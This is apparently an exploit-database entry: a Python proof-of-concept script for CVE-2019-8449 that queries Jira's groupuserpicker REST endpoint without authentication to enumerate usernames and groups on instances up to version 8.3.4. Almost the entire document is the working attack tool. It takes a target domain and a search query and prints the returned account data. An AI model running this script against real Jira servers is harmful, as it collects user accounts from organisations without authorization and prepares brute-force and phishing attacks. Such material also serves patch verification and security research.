# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration) # Date: 2019-09-11 # Exploit Author: Mufeed VH # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/jira # Version: 8.3.4 # Tested on: Pop!_OS 19.10 # CVE : CVE-2019-8449 # CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 # DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/ # CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796 #!/usr/bin/env python __author__ = "Mufeed VH (@mufeedvh)" import os import requests class CVE_2019_8449: def ask_for_domain(self): domain = raw_input("[>] Enter the domain of Jira instance: => ") if domain == "": print("\n[-] ERROR: domain is required\n") self.ask_for_domain() self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain) def ask_for_query(self): self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ") if self.query == "": print("\n[-] ERROR: The query parameter is required\n") self.ask_for_query() def exploit(self): self.ask_for_domain() self.ask_for_query() maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ") showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ") fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ") projectId = raw_input("\n[>] Enter the projectId to fetch: => ") issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ") avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ") caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ") excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ") params = { 'query': self.query, 'maxResults': maxResults, 'showAvatar': showAvatar, 'fieldId': fieldId, 'projectId': projectId, 'issueTypeId': issueTypeId, 'avatarSize': avatarSize, 'caseInsensitive': caseInsensitive, 'excludeConnectAddons': excludeConnectAddons } send_it = requests.get(url = self.url, params = params) try: response = send_it.json() except: print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.") print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.") print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url)) quit() print("\n<========== RESPONSE ==========>\n") print(response) print("\n<==============================>\n") if __name__ == '__main__': os.system('cls' if os.name == 'nt' else 'clear') print(''' ================================================ | | | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 | | Proof of Concept By: Mufeed VH [@mufeedvh] | | | ================================================ ''') CVE_2019_8449().exploit()